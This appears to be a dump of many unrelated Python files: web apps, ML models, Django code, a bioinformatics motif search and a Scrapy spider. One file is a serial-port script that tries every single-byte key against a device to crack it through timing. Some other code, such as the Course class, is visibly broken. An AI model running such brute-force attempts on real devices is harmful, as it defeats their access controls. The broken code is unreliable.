# below -- presumably the Celery task writes its own counts to data.txt.
data = {"han": 0,
        "hon": 0,
        "den": 0,
        "det": 0,
        "denna":0,
        "denne": 0,
        "hen": 0,
        'alltweets': 0}
@app.route('/run')
def index():
    """Kick off the background batch job via Celery and return at once."""
    connect.delay()
    # FIX: the original response text was garbled ("bathc job", "in on hour").
    return "Hello, World! I will run the batch job; come back in one hour!"
@app.route('/getresults', methods=['GET'])
def get_tasks():
    """Serve the batch-job results previously written to data.txt."""
    with open('data.txt','r') as results_file:
        payload = json.load(results_file)
    return jsonify(payload)
|
998,137 | 466d68a3561bd50d46ca793b2146e23d9b39a753 | from app import manager
if __name__ == '__main__':
    # Listen on all interfaces with an ad-hoc self-signed TLS certificate.
    manager.run(host='0.0.0.0', ssl_context='adhoc')
|
998,138 | 9577eaac34c2fd2351c29f2e3587d886ec423c31 | class Course:
def __init__(self, name: str, num: str, instructor: str = 'TBA', schedule: str, credit: int = 0):
self.name = name
self.num = num
self.credit = credit
self.instructor = instructor
department = ''
for i in self.num:
if i not in '1234567890': department += i
self.department = department
    # Rich comparisons order courses by credit hours; equality also
    # requires the same course number.
    def __gt__(self, other):
        return self.credit > other.credit
    def __ge__(self, other):
        return self.credit >= other.credit
    def __eq__(self, other):
        # NOTE(review): defining __eq__ without __hash__ makes instances
        # unhashable in Python 3 -- confirm courses are never used as
        # dict keys or set members.
        return self.num == other.num and self.credit == other.credit
    def __le__(self, other):
        return self.credit <= other.credit
    def __lt__(self, other):
        return self.credit < other.credit
    def finish(self, grade):
        # Record the final grade once the course is completed.
        self.grade = grade
class Schedule:
    """A term's course schedule tracking total credit hours."""
    def __init__(self, term: str = '', courses: list = None):
        # BUG FIX: the shared mutable default ([]) made every Schedule
        # built without an explicit list share the same courses object.
        self.courses = [] if courses is None else courses
        self.term = term
        self.credit = 0
    def __str__(self):
        return 'Course scheudle for {}\nTaking {} credit hours\nCourses: {}'.format(self.term, self.credit, self.courses)
    def addCourses(self, courses: list):
        """Append each course and accumulate its credit hours."""
        for course in courses:
            # BUG FIX: the loop variable was 'i' but the undefined name
            # 'course' was appended, raising NameError on first use.
            self.courses.append(course)
            self.credit += course.credit
class Student:
    """A student with per-term schedules and a GPA placeholder."""
    def __init__(self, name, grade='freshman'):
        self.name = name
        self.schedules = {}  # term -> Schedule
        self.grade = grade
        self.gpa = 0
    def __str__(self):
        return '{} is a {} student with a {} GPA.'.format(self.name, self.grade, self.gpa)
    def register(self, schedule: 'Schedule'):
        # BUG FIX: 'self' was missing from the signature, so calling
        # student.register(schedule) failed.
        self.schedules[schedule.term] = schedule
    def calcGPA(self):
        # Not implemented yet.
        pass
# Fall 2019
fall2019 = Schedule('Fall 2019')
num1011 = Course('Industrial Design Fundamentals 1', 'num1011', 'Sam Harris', 'tr', 2)
num1101 = Course('Intro to Industrial Design 1', 'num1101', 'Steve Chininis', 'm', 1)
num1401 = Course('Intro to Graphic Communication 1', 'num1401', 'Lisa Babb', 't', 1)
num1418 = Course('Intro to Sketching & Modelling 1', 'num1418', 'Dave Lynn', 'r', 1)
num2202 = Course('History of Modern Industrial Design', 'num2202', 'Joyce Medina', 'tr', 3)
apph1040 = Course('Scientific Foundations of Health', 'APPH1040', 'Michele Rosebruck', 'mw')
cee4803 = Course('Origami Engineering', 'CEE4803', 'Glaucio Paulino', 'tr', 3)
fall2019.addCourses([num1011, num1101, num1401, num1418, num2202, apph1040, cee4803])
tynan = Student('Tynan Purdy')
# Spring 2020
cs1301 = Course('Intro to Computing', 'CS1301', 3, 'Dr. Melinda McDaniel', 'mwf')
cs1301.finish(93.63)
|
998,139 | 955dac6633fc84e99d1571d64c3da37c95f78045 | import unittest
from config import Config
class VestingBalanceTestCase(unittest.TestCase):
    """Exercises vesting-balance creation/withdrawal against a test chain.

    Both cases only print the RPC result or the exception, so they never
    fail in the unittest sense.
    """
    def testCreateVestingBalance(self):
        # Create a 10000-unit CDD vesting balance for testaccount6,
        # funded from account 1.2.26 in asset 1.3.4.
        params = {
            "owner": "testaccount6",
            "amount": 10000,
            "asset": "1.3.4",
            "start": "2019-08-6T10:00:00",
            "_type": "cdd",
            "account": "1.2.26"
        }
        gph = Config().gph
        try:
            print("CreateVestingBalance:", gph.vesting_balance_create(**params))
        except Exception as e:
            print(repr(e))
    def testWithdrawVestingBalance(self):
        # Withdraw 1000 units from vesting object 1.13.10 into 1.2.25.
        # NOTE(review): the printed label says "DisApproveWitness" but the
        # call is a vesting-balance withdrawal -- presumably a copy-paste.
        params = {
            "vesting_id": "1.13.10",
            "amount": 1000,
            "asset": "1.3.4",
            "account": "1.2.25"
        }
        gph = Config().gph
        try:
            print("DisApproveWitness:", gph.vesting_balance_withdraw(**params))
        except Exception as e:
            print(repr(e))
if __name__ == "__main__":
    # Run the two cases directly, bypassing the unittest runner.
    case1 = VestingBalanceTestCase("testCreateVestingBalance")
    case1()
    case2 = VestingBalanceTestCase("testWithdrawVestingBalance")
    case2() |
998,140 | 5d40dd7be51f6204225634bdfeb12525de9d28fe | ##################################################################
# MESURE DU TAUX D'OCCUPATION DE PARKINGS A L'AIDE #
# DE CAMERAS VIDEOS #
# -------------------------------------------------------------- #
# Rémi Jacquemard - TB 2018 - HEIG-VD #
# remi.jacquemard@heig-vd.ch #
# https://github.com/remij1/TB_2018 #
# July 2018 #
# -------------------------------------------------------------- #
# Usefull to split a dataset to 3 folders: test, train and dev #
# Each rate can be set, and it can be called from the command #
# line. #
##################################################################
import glob
import os
import re
import random
from shutil import copyfile
import argparse
TEST_RATE = 0.1
DEV_RATE = 0.1
def split_dataset(dataset_path, output_path, exts, test_rate=TEST_RATE, dev_rate=DEV_RATE):
    """
    Randomly split a dataset into train/test/dev folders.

    Files are grouped by base name across the given extensions (e.g. an
    image and its annotation XML), shuffled, and copied so that roughly
    test_rate and dev_rate fractions of the groups land in test/ and
    dev/ respectively, with the remainder in train/.
    """
    TRAIN_PATH = output_path + "/train"
    TEST_PATH = output_path + "/test"
    DEV_PATH = output_path + "/dev"
    # Collect one group of related files per base name carrying exts[0].
    all_files = []
    for root, _, files in os.walk(dataset_path):
        for f in files:
            if f.endswith(exts[0]):
                name = f[:-len(exts[0])]
                related_files = [os.path.join(root, name + ext)
                                 for ext in exts]
                all_files.append(related_files)
    # Shuffle so the split is random rather than directory-ordered.
    random.shuffle(all_files)
    nb_test = test_rate * len(all_files)
    nb_dev = dev_rate * len(all_files)
    for files in all_files:
        # BUG FIX: the original tests used >= 0, which sent one extra file
        # group to test/ (and then one extra to dev/) beyond the rates.
        if nb_test > 0:
            path = TEST_PATH
            nb_test -= 1
        elif nb_dev > 0:
            path = DEV_PATH
            nb_dev -= 1
        else:
            path = TRAIN_PATH
        os.makedirs(path, exist_ok=True)
        for f in files:
            copyfile(f, path + "/" + os.path.basename(f))
# Command-line interface: input/output paths and the related-file
# extensions are required; the split rates are optional overrides.
parser = argparse.ArgumentParser("dataset_splitter")
parser.add_argument("-i", "--input", nargs=1, help="the path to the dataset to split", type=str, required=True)
parser.add_argument("-o", "--output", nargs=1, help="the output path", type=str, required=True)
parser.add_argument("-e", "--exts", nargs='+', help="the extensions of data files. Ex.: if image.jpg and image.xml have to be related, ext: .jpg .xml", type=str, required=True)
parser.add_argument("-t", "--test_rate", nargs=1, help="the proportion of test data", type=float)
parser.add_argument("-d", "--dev_rate", nargs=1, help="the proportion of dev data", type=float)
if __name__ == '__main__':
    args = parser.parse_args()
    dataset_path = args.input[0]
    output_path = args.output[0]
    exts = args.exts
    # Optional rates fall back to the module defaults when not supplied.
    # (Idiom fix: compare against None with 'is not', not '!='.)
    test_rate = TEST_RATE
    if args.test_rate is not None:
        test_rate = args.test_rate[0]
    dev_rate = DEV_RATE
    if args.dev_rate is not None:
        dev_rate = args.dev_rate[0]
    split_dataset(dataset_path, output_path, exts, test_rate, dev_rate)
998,141 | 5eb48e01141598ff7e686b9a4c84f152e0101afe | from __future__ import print_function
import keras
from keras.datasets import mnist
import matplotlib.pyplot as plt
import pickle
import numpy as np
(X_train, y_train), (X_test, y_test) = mnist.load_data()
# NOTE(review): 'pant' duplicates the dataset load and is never used.
pant = mnist.load_data()
class_names = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]
# Scale pixel intensities from [0, 255] down to [0, 1].
X_train = X_train/255.0
X_test = X_test/255.0
# Simple dense classifier: flatten 28x28 images, one hidden ReLU layer,
# softmax over the ten digit classes.
model = keras.Sequential([
    keras.layers.Flatten(input_shape=(28,28)),
    keras.layers.Dense(128, activation ="relu"),
    keras.layers.Dense(10, activation="softmax")
    ])
model.compile(optimizer="adam", loss="sparse_categorical_crossentropy", metrics=["accuracy"])
model.fit(X_train, y_train, epochs=3)
test_loss, test_acc = model.evaluate(X_test, y_test)
print("Test loss is " + str(test_loss))
print("Test acc is " + str(test_acc * 100))
# Show the first five test digits with predicted vs. actual labels.
prediction = model.predict(X_test[:5])
# NOTE(review): 'num' is never used.
num = 0
for i in range (len(prediction)):
    guess = np.argmax(prediction[i])
    actual = y_test[i]
    print("The computer guessed that the number was a ", guess)
    print("The number was actually a ", actual)
    plt.imshow(X_test[i], cmap=plt.cm.binary)
    plt.show()
model.save("ml.model")
print("model saved")
|
998,142 | 2c6741805ca69ac177670de4171cfe742cba5c68 | from django.test import TestCase
from .calc import add, subtract
class CalcTests(TestCase):
    """Unit tests for the calc helpers."""

    def test_add_two_numbers(self):
        """test that two numbers are added"""
        total = add(5, 9)
        self.assertEqual(total, 14)

    def test_subtract_numbers(self):
        """test that two numbers are subtracted from each other and returned"""
        difference = subtract(8, 4)
        self.assertEqual(difference, 4)
|
998,143 | 8214d59b5fd50f4117e3de598244994636e04edb | # Demonstrates logging
# Attributes that can be put into the basicConfig:
# level
# filename
# filemode
# format
# %(name)s - %(levelname)s - %(message)s - %(asctime)s - %(lineno)s
import logging
# Determines the level at which logging will be issued: Info will show all levels up from INFO (INFO,
# WARNING, ERROR, CRITICAL), ERROR will show all levels up from ERROR (ERROR and CRITICAL)
#logging.basicConfig(level = logging.INFO)
# logging.basicConfig(level = logging.ERROR)
# To create new file with log rather than displaying in command line. Filemode w = write/overwrite new
# file, a = write/append file. Order of format items can be changed.
logging.basicConfig(filename = "debugging.log", filemode = "a", level=logging.DEBUG, format = " %(name)s - %(levelname)s - %(message)s - %(asctime)s - %(lineno)s")
name = "Joe"
# Emit one record per severity; all reach debugging.log since the
# threshold above is DEBUG.
logging.error("this is an error")
logging.critical("Critical level")
logging.warning("Don't know %s", name)
logging.info("Still going")
logging.debug("and so is this")
|
998,144 | df89d0b7d39ba30f3d814e71b7c660cbfcac5687 | kilometri=input("Unesite kilometre: ")
# Convert the kilometres read above to miles and print the result.
kilometri_float=float(kilometri)
milje=kilometri_float * 0.6213
print (milje) |
998,145 | 3edd24fadce05375eed7719540734f797047b69b | import sys
sys.path.append("..")
from _231_motifMatrix import profileMotifs, score, countMotifs, consensus
from _251_profileMostProbableKmer import profileMostProbableKmer
from lib import verticalPrint, spacedPrint
def greedyMotifSearch(dna, k, t):
    """Greedy motif search: seed the best motifs with each string's
    k-prefix, then for every k-mer of dna[0] greedily grow a candidate
    collection via the profile-most-probable k-mer of each subsequent
    string, keeping the lowest-scoring collection found."""
    bestMotifs = [row[:k] for row in dna[:t]]
    for start in range(len(dna[0]) - k + 1):
        candidates = [dna[0][start:start + k]]
        for j in range(1, t):
            profile = profileMotifs(candidates)
            candidates.append(profileMostProbableKmer(dna[j], k, profile))
        if score(candidates) < score(bestMotifs):
            bestMotifs = candidates
    return bestMotifs
if __name__ == "__main__":
dna = [
"CAGTAACCGAACACATATGACCGGTCAGATTTCGCAAACATCCCAGGAGATTCGATCTGGCGCCCGATCTTCCAACGTCGTACATCGACATTGGACGTAGTAGGCCATGATACCTGGCAGGTCCGCCCCCGAGAACCATGGAACTACCGACATTGA",
"GTATATGTCCGGGAACCTTCATATAAGCAATAACAAACCTCATGTGCATGCCCCCGCTTATGAGGCGTTCACGCAGGGCTAGGTTAGGTGGCAAAGGCAACCTAAGTCTTCAGCTGACGGCCCCCACTGGAATTAGGCTATCCTAAGGGTTGGTAG",
"GTACGTATCGTATATGGCGGGGGGATGATATTCTCTGGAAGCGAATGGTTAAAACCGAATTTGGATATTGCTGCATAAGTCCGGACTGAAAATCGTTATTGGCTACAACTTGAAGTCATGAGGTTAAGGTATAGGACCATGTTCGGTTACATGCTG",
"CCTGTAACGCGCGCTCCGAGGAACTCTGAATTTAGCGATTATCTTGACGCCCCTTTAGTCGTGTGACTCTTGCGAACTCCCGACGACTATACCTTAAACCGAATATCGGTCGTGCTACCTCCCGGAGACGATATATATGCCCGGCTGGTACCCTGT",
"GAATGTAATCAAGCACTCAGACCAAACGGTTAGCCACTCTATCATGGGCCGCATTGCTAACAATACGACCGGATTACCTTCTATAGACGAGCTCGCTACTTCTGCGCAGTCTCCCTTTCTTTTTACATACACTAACGTTATGCACTCGCTGCCTAC",
"AAGCAGTACACCAGCTCGCCGTAGAGAGTCACAATTTGTTCGGCGTCAAGTCCGCATCAGTTTTTTCCCGTCCGCGTTCCCCGCGCATAAGACCGGAGGTGACTCGCAAAGGAAACGTATGAATGGCGGGGCGGGCGAATTTCTTGAATCCGCGTC",
"AAATTCCCTTACTTATACGCCCGGAACGCATTCTTCTTTTTACGGGTAGGGATGGACTGATGGACAGACAGGCAGTTACCATACTATCAACGGTCAGAATACTCGTCGGAGTGGTACTAAACAATCATGTTGCTATCCGGGCTCTGTTCACGCCAT",
"AGCGAAAAGCGCTCTGCGATTCAACCCCCAACGGTATCTTGCCGCTTCCGCCAGCGAATGACACGTGCCGCTGTTAGTGATGTACGCGGCCCTCAGAATGACCTGCAAGATTAATGGCCCCTTCACCATATCCGGACGTAAGCTGGATAGGGCCGG",
"TTGGTACCGACTCAAGATCCTCGGCCGATACACTGACAATACGGCCGGCTTTGCTTAGCATAATAAGTCACCAACTCCCTCCCGGGTATGGCCGTGGTAGTATACTATCACCTCCACTCTCGTTAATACCAAATCCTAATTGAGTTCACCAGGAAT",
"GCGATATGATTTTGTCTCCTAACATGAGTCTAAAGTGTATGATAATTGATAAATGTCATGAGATATGACCGGACTGAGTAACCGATTACCCAAAATAGACAAGGGTCCACTTTGCTCCCTAGCTAGTGATTAGGATAGCTACTCTACGCGGAGCCG",
"AATAGTTAGGAATCGCTGGTATAGACGCAGGCAAGAGAAAGTTTCCCTACAAATTTATGTACAATCGTGGAAGCTGGGACAAAGCCTGTGTCGATGTGTTTGGCTGGCACGTTGCGCGGAGTAAGTGAATGATAATAGGACCGGGACAGTTTCCCA",
"ACGTACCGGCTTGAAAATGGTGTATTGTCGTGCGCCAGCTTGGTAAAGAAGGGAGGCATGCATGATTGAGGCGCTAGAACGTCGGTGCTTGCATTTATAAGGTGAAACCCACCTGAAGACATGACCGGACGTCTGGATTCGTTTGAATAGGTCCGG",
"GTACTTTCACATTCGCGGACTTGGTACTCGTCACGTAAGCCTCTTAACGCCAAACACGACCGGGGCTTATCAGTTTGTTGGGGTATGGAGCCTGTGCGATATATTTAATCTGACCACGTCACATAAGCCCGGTCCAGGAAGTCGACCGGGGGAAAT",
"AGCGACAGATGCTGAAACCATTAAGTCGTGTAGGGAGAAAAACCTTATTCATTCCATCGCCATGCCACTCTTTGGCTGCAAACCAAGGCTCGTCCTTAGACGATAGGCTGATAAGACCGGCTTCCGAGAGTGGAGGCTTCATTTCCATAATGCTAG",
"GTATATGTCCGGTCAATGACACAGTGAACCTACCGAGTCGCAGCGATTGAGATAATTCACCAAGCGCTAGGTTTTATTAGTCGTCTAACACGGAGTGCTATAGGAATAATTAGGTGTGCCCTAATTTACCGGTGCCCGCTCAGCCAAACTCTAATG",
"GTGTCATCCCTCAGCGGTGTTAGCTAGTTATAGGTCCCTACTGTCCGTCAAGCTAAGGTAATGGAAGTAGTGTTACGAGCAGCCAATATTTGTAATCCCGCAGTTAGAAAATATGGCCGGGTTCCTACTCCCAGATTGTCCTACACGCCCGGCAGA",
"TCGAAGCTGGGGGTACTCCCCCACATGTCTAGAGTGCAGCTTCGGAAACATCGTACGCTTAGCGGGGATACGAGTGACTCAGTAGGCCCGGTGTTCTACATTTAATGGCCTGGCCTAAGGTAATAAGGCCGGGCGGTATTAACCTTTCAGATGGTT",
"ACTGAAAACCATCAGATACATTAAGGGCTTAGAGCAGGGGCTTCTATGCTATTACGTTTTGGTTAAAGCCACGCCGTTGCTTACGACCCGCATCCGCAACGAGCCAAAGTCTTTGCTTGGACCTGAGAATTCTAATATAGATGTACATAAGTCCGG",
"TGATACGACCGGCTAATTTACCATGAGTTTACTATAGCTAAAATTAAAAGCAGTAAACTCTGACATGAGCGCGTTGCTCGTGTCCCCCTAAGTCCCACACCAAGCAGCGGCCAAAAAACCTAGCCTCTACAAGAACCCCCATCTGTTGATGTACTG",
"CCCTTCGGACGCGTGGTCCGCGTCCTCACAATTGCGGTCCGCCCGACACAAGGTTGAGTCTTGCTCTTTTACTCTGACTGAAGGTGATACGCCCGGTAGAATGACATTCAGCGACAGGAATCTGCAAGAGTAGATTTCTCGCCCGGGCTTAACTAT",
"TCAAAGCATTCAGCATAGGGCCGGTCGCCAAGTCAGACCTAGAGGAGATGATAGCAATTGTCCAACGAAGATGTATTGTACTTGATGACTAAGCATTCCAGGATGAGATGTCACAATGAAGCGGACCTACTCTAGAATAGCTCGCTATAGGTCCTA",
"TCGACTCATAAATTCGTGAGAGATCATTCAATATGGGTATACTACTTCGCGCTACCTTTGTTCATTAATACATCCACGCGTAGGCTAGAACTAATCTAAGTATTTGATGAATAGGCCCGGGTAGGAAAAAGCCTGAACCCGAGGGCTACGTCCCGC",
"TTGTTATGCACGTTCTCTCTTTATGAACGACTCATGAAATAGGACCGGCAGTATTGGACTCGCATTTAGTATAATCAGTCGTGGTATCGATGGTTGTGCCGTCTGGCTCCGGATTTTCGTCACCTGCCCTCCCTAGTCGACTTTAGAAGGAACGGC",
"GTACCATGTGTGTTGGTCGCCTAACCTGAAAGATAGTAATAGGGCTGTATGCGTCCTCTAGTACATTTCAGAGCGAGATTTAGATTAGAAACCGGCTGCGAATATCCCACAGAGGACCAACCGAGTAAAATGAGTACTACGTTCGGATAAGGCCGG",
"TGGGTGTGCACATGCGTGTTGCTTTCTGGAAGTCTCTGAACGGAAGTGACATAGAAATCCTGGGGGAACGTTAGGTGCCCAGTTTCTGAATTTTGTATATCAAATTCAGAGACTAGGTGGAGTTCTAAACGACTGTGACTAAGTTTATATGACCGG",
]
verticalPrint(greedyMotifSearch(dna,12,25))
print(consensus(greedyMotifSearch(dna,12,25)))
|
998,146 | 782fc9d99165ac2d4d6c180819d97e9b3ef14d93 | import torch
import torch.nn as nn
from torch.autograd import Variable, grad
import numpy as np
import os
import common
class MWCNN(nn.Module):
    """Multi-level Wavelet CNN (U-Net-like): three DWT downsampling levels
    with conv blocks, a processing bottleneck, and mirrored IWT upsampling
    with additive skip connections from each encoder level."""
    def __init__(self, args, conv=common.default_conv):
        super(MWCNN, self).__init__()
        #n_resblocks = args.n_resblocks
        n_feats = 64#args.n_feats
        kernel_size = 3
        self.scale_idx = 0
        nColor = 1#args.n_colors
        act = nn.ReLU(True)
        # Discrete wavelet transform quadruples channels while halving
        # spatial size; IWT inverts it.
        self.DWT = common.DWT()
        self.IWT = common.IWT(args)
        n = 1
        m_head = [common.BBlock(conv, nColor, n_feats, kernel_size, act=act)]
        d_l0 = []
        d_l0.append(common.DBlock_com1(conv, n_feats, n_feats, kernel_size, act=act, bn=False))
        # Each encoder level first compresses the 4x DWT channels by half.
        d_l1 = [common.BBlock(conv, n_feats * 4, n_feats * 2, kernel_size, act=act, bn=False)]
        d_l1.append(common.DBlock_com1(conv, n_feats * 2, n_feats * 2, kernel_size, act=act, bn=False))
        d_l2 = []
        d_l2.append(common.BBlock(conv, n_feats * 8, n_feats * 4, kernel_size, act=act, bn=False))
        d_l2.append(common.DBlock_com1(conv, n_feats * 4, n_feats * 4, kernel_size, act=act, bn=False))
        # Bottleneck: process at the deepest level, then expand channels
        # back for the IWT.
        pro_l3 = []
        pro_l3.append(common.BBlock(conv, n_feats * 16, n_feats * 8, kernel_size, act=act, bn=False))
        pro_l3.append(common.DBlock_com(conv, n_feats * 8, n_feats * 8, kernel_size, act=act, bn=False))
        pro_l3.append(common.DBlock_inv(conv, n_feats * 8, n_feats * 8, kernel_size, act=act, bn=False))
        pro_l3.append(common.BBlock(conv, n_feats * 8, n_feats * 16, kernel_size, act=act, bn=False))
        # Decoder levels mirror the encoder.
        i_l2 = [common.DBlock_inv1(conv, n_feats * 4, n_feats * 4, kernel_size, act=act, bn=False)]
        i_l2.append(common.BBlock(conv, n_feats * 4, n_feats * 8, kernel_size, act=act, bn=False))
        i_l1 = [common.DBlock_inv1(conv, n_feats * 2, n_feats * 2, kernel_size, act=act, bn=False)]
        i_l1.append(common.BBlock(conv, n_feats * 2, n_feats * 4, kernel_size, act=act, bn=False))
        i_l0 = [common.DBlock_inv1(conv, n_feats, n_feats, kernel_size, act=act, bn=False)]
        m_tail = [conv(n_feats, nColor, kernel_size)]
        self.head = nn.Sequential(*m_head)
        self.d_l2 = nn.Sequential(*d_l2)
        self.d_l1 = nn.Sequential(*d_l1)
        self.d_l0 = nn.Sequential(*d_l0)
        self.pro_l3 = nn.Sequential(*pro_l3)
        self.i_l2 = nn.Sequential(*i_l2)
        self.i_l1 = nn.Sequential(*i_l1)
        self.i_l0 = nn.Sequential(*i_l0)
        self.tail = nn.Sequential(*m_tail)
    def forward(self, x):
        # Encoder: conv at each scale, DWT between scales.
        x0 = self.d_l0(self.head(x))
        x1 = self.d_l1(self.DWT(x0))
        x2 = self.d_l2(self.DWT(x1))
        #print ("forward device:",x2.device,dir(self.DWT))
        # Decoder: IWT upsampling with additive skips from x2, x1, x0.
        x_ = self.IWT(self.pro_l3(self.DWT(x2))) + x2
        x_ = self.IWT(self.i_l2(x_)) + x1
        x_ = self.IWT(self.i_l1(x_)) + x0
        x = self.tail(self.i_l0(x_))# + x #here commented +x since it is taken care in the calling forward method
        return x
class DataConsistencyLayer(nn.Module):
    """MRI data-consistency layer: keeps the sampled k-space locations
    (per us_mask) from the measured data and fills the rest from the
    network prediction's k-space.

    NOTE(review): uses the legacy torch.rfft/torch.ifft signal API, which
    was removed in torch >= 1.8 -- this module requires an older torch.
    """
    def __init__(self,us_mask):
        super(DataConsistencyLayer,self).__init__()
        # Binary undersampling mask (1 where k-space was measured).
        self.us_mask = us_mask
    def forward(self,predicted_img,us_kspace):
        # us_kspace = us_kspace[:,0,:,:]
        predicted_img = predicted_img[:,0,:,:]
        kspace_predicted_img = torch.rfft(predicted_img,2,True,False).double()
        # print (us_kspace.shape,predicted_img.shape,kspace_predicted_img.shape,self.mask.shape)
        # Measured locations come from the acquired k-space; unmeasured
        # locations come from the prediction's k-space.
        updated_kspace1 = self.us_mask * us_kspace
        updated_kspace2 = (1 - self.us_mask) * kspace_predicted_img
        updated_kspace = updated_kspace1[:,0,:,:,:] + updated_kspace2
        updated_img = torch.ifft(updated_kspace,2,True)
        #update_img_abs = torch.sqrt(updated_img[:,:,:,0]**2 + updated_img[:,:,:,1]**2)
        # Keep only the real channel and restore a channel dimension.
        update_img_abs = updated_img[:,:,:,0]
        update_img_abs = update_img_abs.unsqueeze(1)
        return update_img_abs.float()
class DnCn(nn.Module):
    """DC-CNN style cascade: ``nc`` stages of (pretrained MWCNN denoiser +
    k-space data-consistency layer).

    Every MWCNN stage is initialised from the same checkpoint given by
    ``args.checkpoint``; the undersampling mask is loaded from
    ``args.usmask_path`` for the configured acceleration factor.
    """
    def __init__(self,args,n_channels=2, nc=1, nd=5,**kwargs):
        super(DnCn, self).__init__()
        self.nc = nc   # number of cascaded (CNN + DC) stages
        self.nd = nd   # depth parameter; used for logging only here
        #print (args.usmask_path)
        usmask_path = ''   # NOTE(review): unused local, superseded by us_mask_path below
        us_mask_path = os.path.join(args.usmask_path,'mask_{}.npy'.format(args.acceleration_factor))
        # Mask reshaped for broadcasting against k-space and moved to the target device.
        us_mask = torch.from_numpy(np.load(us_mask_path)).unsqueeze(2).unsqueeze(0).to(args.device)
        #print (us_mask.device)
        print('Creating D{}C{}'.format(nd, nc))
        conv_blocks = []
        dcs = []
        checkpoint = torch.load(args.checkpoint)
        #conv_layer = conv_block
        #print ("DnCN --init", args.device)
        for i in range(nc):
            dwtunetmodel = MWCNN(args)
            #print("dwtunetmodel: ",dwtunetmodel)
            # Each stage starts from the same pretrained weights.
            dwtunetmodel.load_state_dict(checkpoint['model'])
            #conv_blocks.append(MWCNN(args))
            conv_blocks.append(dwtunetmodel)
            dcs.append(DataConsistencyLayer(us_mask))
        self.conv_blocks = nn.ModuleList(conv_blocks)
        # NOTE(review): plain list rather than nn.ModuleList -- the DC layers
        # hold no learnable parameters, but they are invisible to .to()/.cuda().
        self.dcs = dcs
    def forward(self,x,k):
        """Run the cascade; each stage denoises residually then re-enforces
        consistency with the measured k-space ``k``."""
        for i in range(self.nc):
            x_cnn = self.conv_blocks[i](x)
            x = x + x_cnn   # residual connection around the denoiser
            # x = self.dcs[i].perform(x, k, m)
            x = self.dcs[i](x,k)
        return x
|
998,147 | 0d1e3fb200d496d9e8c1ef27962e3e7478a647fc | from django.db import models
from django.contrib import admin
class Cursos(models.Model):
    """A course that students can be enrolled in (via Boleta)."""
    nombrecurso = models.CharField(max_length=30)   # course name
    def __str__(self):
        return self.nombrecurso
class Alumnos(models.Model):
    """A student, linked to courses through the Boleta m2m table."""
    nombrealumno = models.CharField(max_length=60)   # student name
    calificaciones = models.TextField()              # grades (free text)
    Curso = models.ManyToManyField(Cursos, through='Boleta')
    def __str__(self):
        # Bug fix: the original returned self.nombrecurso, but this model has
        # no such attribute (that field lives on Cursos) -- rendering any
        # Alumnos instance raised AttributeError. Return the student's name.
        return self.nombrealumno
class Boleta(models.Model):
    """Through-table joining a student to a course (enrollment record)."""
    curso = models.ForeignKey(Cursos, on_delete=models.CASCADE)
    alumno = models.ForeignKey(Alumnos, on_delete=models.CASCADE)
class NotasInLine(admin.TabularInline):
    """Inline editor for Boleta rows inside the admin pages below."""
    model = Boleta
    extra = 1   # one empty extra row for quick enrollment
class CursosAdmin(admin.ModelAdmin):
    """Course admin with inline enrollment editing."""
    inlines = (NotasInLine,)
class AlumnosAdmin (admin.ModelAdmin):
    """Student admin with inline enrollment editing."""
    inlines = (NotasInLine,)
|
998,148 | 8e35544a47ff3ac3482b3c80c8ff0f8d45d3814c | from serial import Serial
from time import sleep
''' 1) Try crack single byte. Run logic for ~300 sec '''
''' 2) Save logic to CSV file (this directory) '''
''' 3) Run read_csv.py to display time '''
# Open the target device once up front (verifies the port exists), then
# re-open per attempt so each key guess starts from a clean connection.
ser = Serial('COM3', 9600)
ser.close()

# Try every single-byte key from 0xFF down to 0x01; the sleeps pace the
# writes so the external timing capture (see header notes) can separate
# attempts.
for key in range(255, 0, -1):
    ser.open()
    sleep(0.02)
    # send 16 zeros
    for _ in range(16):
        ser.write(b'\x00')
    sleep(0.03)
    # header
    ser.write(b'\xf5')
    ser.write(b'\xdf')
    ser.write(b'\xff')
    ser.write(b'\x00')
    ser.write(b'\x07')
    # key
    ser.write(bytes([key]))
    ser.write(b'\xff')
    ser.write(b'\xff')
    ser.write(b'\xff')
    ser.write(b'\xff')
    ser.write(b'\xff')
    ser.write(b'\xff')
    # read
    ser.write(b'\x70')
    ser.flush()   # push all buffered bytes out before closing
    sleep(0.02)
    ser.close()
|
998,149 | 89c63ef05ceaea4950443e6ac67a1785c6a4c033 | # Author: Zsolt Kébel
# Date: 18/11/2020
# Redact sensitive words: replace every word listed in sensitive_words.txt
# with "*" in the contents of text.txt and print the censored result.
file = open("text.txt")
swFile = open("sensitive_words.txt")

text = file.read()
sensitiveWords = swFile.readlines()

# Bug fix: the original recomputed `newText = text.replace(...)` from the
# unmodified text on every iteration, so only the last sensitive word was
# ever censored. Replacements must accumulate. readlines() also keeps the
# trailing newline on each word, which would prevent any match, so each
# word is stripped first.
newText = text
for sensitiveWord in sensitiveWords:
    sensitiveWord = sensitiveWord.strip()
    if sensitiveWord:
        newText = newText.replace(sensitiveWord, "*")
print(newText)

file.close()
swFile.close()
|
998,150 | 539a0b290cd374d822e9d0d576596ecb96e496d9 | # -*- coding: utf-8 -*-
import scrapy
from datetime import datetime
from papermedia.items import ScienceAdvancesItem
from scrapy.http import Request
class ScienceAdvancesSpider(scrapy.Spider):
    """Scrape the current issue's table of contents from Science Advances,
    then follow each article's full-text link to collect its sections.
    """
    name = "scienceadvances"
    # allowed_domains = ["advances.sciencemag.org"]
    __url_root = 'http://advances.sciencemag.org'

    def start_requests(self):
        """Build the current volume/issue URL from today's date.

        Volume 1 was 2015, hence year - 2014.
        NOTE(review): issue = month - 1 yields 0 in January -- confirm the
        journal's issue numbering before relying on this around year end.
        """
        vol = datetime.now().year - 2014
        issue = datetime.now().month - 1
        self.__vol_issue = 'VOL {}, ISSUE {}'.format(vol, issue)
        link = self.__url_root + '/content/{}/{}'.format(vol, issue)
        # NOTE(review): make_requests_from_url is deprecated in newer Scrapy.
        yield self.make_requests_from_url(link)

    def parse(self, response):
        """Walk the issue TOC: one node per subject, then one per article.

        Emits a Request per article whose 'full' link exists; the partially
        filled item rides along in request meta.
        """
        subject_nodes = response.xpath('//li[@class="issue-toc-section issue-toc-section-contents"]'
                                       + '/ul[@class="toc-section item-list"]/li')
        for subject_node in subject_nodes:
            subject = subject_node.xpath('./h2').extract()[0]
            item_nodes = subject_node.xpath('./ul[@class="toc-section item-list"]/li')
            for item_node in item_nodes:
                item = ScienceAdvancesItem(
                    publication_date=item_node.xpath(
                        './/p[@class="highwire-cite-metadata byline"]/time/text()').extract(),
                    vol_issue=self.__vol_issue,
